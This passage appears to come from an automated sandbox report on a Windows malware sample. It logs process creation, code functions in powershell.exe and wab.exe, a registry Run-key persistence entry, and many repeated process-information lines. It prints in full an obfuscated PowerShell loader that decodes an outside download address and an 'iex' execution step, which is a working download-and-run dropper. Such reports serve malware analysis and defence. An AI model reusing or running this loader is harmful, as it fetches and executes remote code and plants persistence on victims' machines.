,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid 'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan% Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat lyN roteae,etribgCocard Senso.& Abais&Centra TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen (Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm Adelh.Exc.llNMaskineD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6; $Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183, $Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid 'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1 ,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn ,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid 'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan% Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat lyN roteae,etribgCocard Senso.& Abais&Centra TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen (Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm Adelh.Exc.llNMaskineD Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 26_2_004044A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFAAC3A0952 push E95B66D0h; ret 11_2_00007FFAAC3A09C9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_07C608C2 push eax; mov dword ptr [esp], ecx 15_2_07C60AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_07C60AB8 push eax; mov dword ptr [esp], ecx 15_2_07C60AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_097403F6 push ss; iretd 15_2_09740419
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_0974439A push 8D024F24h; iretd 15_2_097443A3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_09742679 push es; iretd 15_2_0974267A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_09744403 push edx; retf 15_2_09744424
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_09740698 push ebp; ret 15_2_097406B9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_0044693D push ecx; ret 26_2_0044694D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_0044DB70 push eax; ret 26_2_0044DB84
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_0044DB70 push eax; ret 26_2_0044DBAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 26_2_00451D54 push eax; ret 26_2_00451D61
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_0044B090 push eax; ret 27_2_0044B0A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_0044B090 push eax; ret 27_2_0044B0CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_00451D34 push eax; ret 27_2_00451D41
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_00444E71 push ecx; ret 27_2_00444E81
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 28_2_00414060 push eax; ret 28_2_00414074
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 28_2_00414060 push eax; ret 28_2_0041409C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 28_2_00414039 push ecx; ret 28_2_00414049
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 28_2_004164EB push 0000006Ah; retf 28_2_004165C4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 28_2_00416553 push 0000006Ah; retf 28_2_004165C4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 28_2_00416555 push 0000006Ah; retf 28_2_004165C4
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Naergaaende Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Naergaaende Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 27_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 27_2_004047CB
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
